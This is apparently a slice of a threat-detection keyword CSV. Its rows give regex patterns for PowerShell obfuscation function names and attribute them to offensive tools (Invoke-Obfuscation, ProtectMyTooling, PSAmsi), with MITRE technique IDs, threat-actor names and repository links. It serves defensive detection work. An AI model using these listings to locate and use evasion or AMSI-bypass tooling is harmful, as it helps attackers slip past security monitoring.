"*Out-ObfuscatedExpressionAst *",".{0,1000}Out\-ObfuscatedExpressionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54134"
"*Out-ObfuscatedExpressionAst *",".{0,1000}Out\-ObfuscatedExpressionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54135"
"*Out-ObfuscatedFileRedirectionAst *",".{0,1000}Out\-ObfuscatedFileRedirectionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54136"
"*Out-ObfuscatedFileRedirectionAst *",".{0,1000}Out\-ObfuscatedFileRedirectionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54137"
"*Out-ObfuscatedForEachStatementAst *",".{0,1000}Out\-ObfuscatedForEachStatementAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54138"
"*Out-ObfuscatedForEachStatementAst *",".{0,1000}Out\-ObfuscatedForEachStatementAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54139"
"*Out-ObfuscatedForStatementAst *",".{0,1000}Out\-ObfuscatedForStatementAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54140"
"*Out-ObfuscatedForStatementAst *",".{0,1000}Out\-ObfuscatedForStatementAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54141"
"*Out-ObfuscatedFunctionDefinitionAst *",".{0,1000}Out\-ObfuscatedFunctionDefinitionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54142"
"*Out-ObfuscatedFunctionDefinitionAst *",".{0,1000}Out\-ObfuscatedFunctionDefinitionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54143"
"*Out-ObfuscatedFunctionMemberAst *",".{0,1000}Out\-ObfuscatedFunctionMemberAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54144"
"*Out-ObfuscatedFunctionMemberAst *",".{0,1000}Out\-ObfuscatedFunctionMemberAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54145"
"*Out-ObfuscatedHashtableAst *",".{0,1000}Out\-ObfuscatedHashtableAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54146"
"*Out-ObfuscatedHashtableAst *",".{0,1000}Out\-ObfuscatedHashtableAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54147"
"*Out-ObfuscatedIfStatementAst *",".{0,1000}Out\-ObfuscatedIfStatementAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54148"
"*Out-ObfuscatedIfStatementAst *",".{0,1000}Out\-ObfuscatedIfStatementAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54149"
"*Out-ObfuscatedIndexExpressionAst *",".{0,1000}Out\-ObfuscatedIndexExpressionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54150"
"*Out-ObfuscatedIndexExpressionAst *",".{0,1000}Out\-ObfuscatedIndexExpressionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54151"
"*Out-ObfuscatedInvokeMemberExpressionAst *",".{0,1000}Out\-ObfuscatedInvokeMemberExpressionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54152"
"*Out-ObfuscatedInvokeMemberExpressionAst *",".{0,1000}Out\-ObfuscatedInvokeMemberExpressionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54153"
"*Out-ObfuscatedLabeledStatementAst *",".{0,1000}Out\-ObfuscatedLabeledStatementAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54154"
"*Out-ObfuscatedLabeledStatementAst *",".{0,1000}Out\-ObfuscatedLabeledStatementAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54155"
"*Out-ObfuscatedLoopStatementAst *",".{0,1000}Out\-ObfuscatedLoopStatementAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54156"
"*Out-ObfuscatedLoopStatementAst *",".{0,1000}Out\-ObfuscatedLoopStatementAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54157"
"*Out-ObfuscatedMemberAst *",".{0,1000}Out\-ObfuscatedMemberAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54158"
"*Out-ObfuscatedMemberAst *",".{0,1000}Out\-ObfuscatedMemberAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54159"
"*Out-ObfuscatedMemberExpressionAst *",".{0,1000}Out\-ObfuscatedMemberExpressionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54160"
"*Out-ObfuscatedMemberExpressionAst *",".{0,1000}Out\-ObfuscatedMemberExpressionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54161"
"*Out-ObfuscatedMergingRedirectionAst *",".{0,1000}Out\-ObfuscatedMergingRedirectionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54162"
"*Out-ObfuscatedMergingRedirectionAst *",".{0,1000}Out\-ObfuscatedMergingRedirectionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54163"
"*Out-ObfuscatedNamedAttributeArgumentAst *",".{0,1000}Out\-ObfuscatedNamedAttributeArgumentAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54164"
"*Out-ObfuscatedNamedAttributeArgumentAst *",".{0,1000}Out\-ObfuscatedNamedAttributeArgumentAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54165"
"*Out-ObfuscatedNamedBlockAst *",".{0,1000}Out\-ObfuscatedNamedBlockAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54166"
"*Out-ObfuscatedNamedBlockAst *",".{0,1000}Out\-ObfuscatedNamedBlockAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54167"
"*Out-ObfuscatedParamBlockAst *",".{0,1000}Out\-ObfuscatedParamBlockAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54168"
"*Out-ObfuscatedParamBlockAst *",".{0,1000}Out\-ObfuscatedParamBlockAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54169"
"*Out-ObfuscatedParameterAst *",".{0,1000}Out\-ObfuscatedParameterAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54170"
"*Out-ObfuscatedParameterAst *",".{0,1000}Out\-ObfuscatedParameterAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54171"
"*Out-ObfuscatedParenExpressionAst *",".{0,1000}Out\-ObfuscatedParenExpressionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54172"
"*Out-ObfuscatedParenExpressionAst *",".{0,1000}Out\-ObfuscatedParenExpressionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54173"
"*Out-ObfuscatedPipelineAst *",".{0,1000}Out\-ObfuscatedPipelineAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54174"
"*Out-ObfuscatedPipelineAst *",".{0,1000}Out\-ObfuscatedPipelineAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54175"
"*Out-ObfuscatedPipelineBaseAst *",".{0,1000}Out\-ObfuscatedPipelineBaseAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54176"
"*Out-ObfuscatedPipelineBaseAst *",".{0,1000}Out\-ObfuscatedPipelineBaseAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54177"
"*Out-ObfuscatedPropertyMemberAst *",".{0,1000}Out\-ObfuscatedPropertyMemberAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54178"
"*Out-ObfuscatedPropertyMemberAst *",".{0,1000}Out\-ObfuscatedPropertyMemberAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54179"
"*Out-ObfuscatedRedirectionAst *",".{0,1000}Out\-ObfuscatedRedirectionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54180"
"*Out-ObfuscatedRedirectionAst *",".{0,1000}Out\-ObfuscatedRedirectionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54181"
"*Out-ObfuscatedReturnStatementAst *",".{0,1000}Out\-ObfuscatedReturnStatementAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54182"
"*Out-ObfuscatedReturnStatementAst *",".{0,1000}Out\-ObfuscatedReturnStatementAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54183"
"*Out-ObfuscatedScriptBlockAst *",".{0,1000}Out\-ObfuscatedScriptBlockAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54184"
"*Out-ObfuscatedScriptBlockAst *",".{0,1000}Out\-ObfuscatedScriptBlockAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54185"
"*Out-ObfuscatedScriptBlockExpressionAst *",".{0,1000}Out\-ObfuscatedScriptBlockExpressionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54186"
"*Out-ObfuscatedScriptBlockExpressionAst *",".{0,1000}Out\-ObfuscatedScriptBlockExpressionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54187"
"*Out-ObfuscatedStatementAst *",".{0,1000}Out\-ObfuscatedStatementAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54188"
"*Out-ObfuscatedStatementAst *",".{0,1000}Out\-ObfuscatedStatementAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54189"
"*Out-ObfuscatedStatementBlockAst *",".{0,1000}Out\-ObfuscatedStatementBlockAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54190"
"*Out-ObfuscatedStatementBlockAst *",".{0,1000}Out\-ObfuscatedStatementBlockAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54191"
"*Out-ObfuscatedStringCommand*",".{0,1000}Out\-ObfuscatedStringCommand.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54192"
"*Out-ObfuscatedStringCommand*",".{0,1000}Out\-ObfuscatedStringCommand.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54193"
"*Out-ObfuscatedStringCommand.ps1*",".{0,1000}Out\-ObfuscatedStringCommand\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54194"
"*Out-ObfuscatedStringCommand.ps1*",".{0,1000}Out\-ObfuscatedStringCommand\.ps1.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","54195"
